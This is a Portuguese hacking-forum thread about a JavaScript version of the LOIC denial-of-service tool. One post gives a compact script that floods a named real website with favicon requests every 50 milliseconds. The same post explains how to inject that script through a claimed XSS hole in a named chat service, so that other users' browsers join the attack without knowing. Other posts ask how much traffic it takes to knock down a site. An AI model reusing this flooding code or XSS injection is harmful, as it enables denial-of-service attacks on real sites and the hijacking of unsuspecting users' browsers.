como faço para usar isso ?
Unconfigured Ad Widget
Collapse
Anúncio
Collapse
No announcement yet.
LOIC em JavaScript
Collapse
X
-
Usar sozinho, no próprio PC, é o mesmo que abrir o próprio Loic binário e (tentar) atacar.
Ele não usa o poder do servidor, e sim do usuário. Porém, com algumas modificações, é possível fazer com que o usuário ataque o alvo sem que esteja ciente, somente ao visitar a página.Este material pode ser compartilhado, desde que os devidos créditos sejam dados.
Notify-list · Twitter · Blog
Nova lei: Invadir computadores protegidos é crime.
Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
- Top
Comment
-
Bom estive analisando o código e confirmo que ele não funciona
pois é só visual e não possui poder nenhum
podem testar cliquem em começar ataque sem nenhuma url definida
a contagem vai começar do mesmo jeito
- Top
Comment
-
Bom estive analisando o código e confirmo que ele não funciona
pois é só visual e não possui poder nenhum
podem testar cliquem em começar ataque sem nenhuma url definida
a contagem vai começar do mesmo jeito
Código HTML:var rID =Number(new Date()); var img = new Image(); img.onerror = function () { onFail(rID); }; img.onabort = function () { onFail(rID); }; img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
=]Este material pode ser compartilhado, desde que os devidos créditos sejam dados.
Notify-list · Twitter · Blog
Nova lei: Invadir computadores protegidos é crime.
Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
- Top
Comment
-
Se alguém quiser um formato compacto e ter noção de como isso poderia ser usado no XSS, aqui vai uma versão compacta:
Código:function f_(t_) {var r_=Number(new Date());var img = new Image();img.setAttribute("src",t_+"?d="+r_);};setInterval("f_('http://www.uol.com.br/favicon.ico')",50);
pra usar é so colar isso no console do Chrome, no exemplo ele flooda o uol, pegando o icone do uol, a um tempo de 50 milisegundos.
Acredito que a cada nova requisição do sistema, o servidor precisa criar novas estruturas e tal, portanto EU ACHO, intuitivamente que é mais interessante para o atacante que as mensagens de entrega do servidor sejam curtas e que a ocupação com o servidor seja mais em receber mais entradas (pra criar mais chamadas de sistema e etc), mas isso é so uma intuição. Exatamente por isso que acredito que seja mais inteligente pegar a menor imagem possível do servidor, ou seja, pega o ícone favicon.ico que todo servidor geralmente tem.
Um sistema que pode ser usado para usar esse LOIC é o Chat do T3rra, uma sala cheia do Chat do t3rra tem 50 pessoas.
Existe uma vulnerabilidade do chat do t3rra que permite você enviar esse LOIC.
Código:http://s1.trrsf.com.br/chat_client_stf/prod/_js/chatClient_compressed.js
valMessage = font + _strEscape(initialText + " " + valMessage + " " + finalText) + fontClose;
Basta que você retire o _strEscape, ficando assim:
valMessage = font + (initialText + " " + valMessage + " " + finalText) + fontClose;
e pronto, você pode injetar o LOIC em várias salas e fazer os usuarios de zumbis.
Portanto bastaria que alguém injetasse assim:
Código:<script>function f_(t_) {var r_=Number(new Date());var img = new Image();img.setAttribute("src",t_+"?d="+r_);};setInterval("f_('http://www.uol.com.br/favicon.ico')",50);</script>
Escrevi isso para mostrar como que o XSS pode ser usado em conjunto com o LOIC para derrubar sistemas, espero que seja útil.
- Top
Comment
-
O código faz várias requisições ajax ao servidor, não é? Fazendo o servidor - no momento em que as requisições ultrapassarem sua capacidade de processamento - "cair".
Obrigado por compartilhar.
You say yes, I say no
You say stop but I say go, go, go
You say goodbye and I say hello
- Top
Comment
-
muito legal,mas quantos pacotes seria necessario para derrubar um site fraco ou quantos kbts ou giga ou mb seria necessario?sigpic
Cedo ou tarde, você vai aprender, assim como eu aprendi, que existe uma diferença entre CONHECER o caminho e TRILHAR o caminho.
- Top
Comment
X
Comment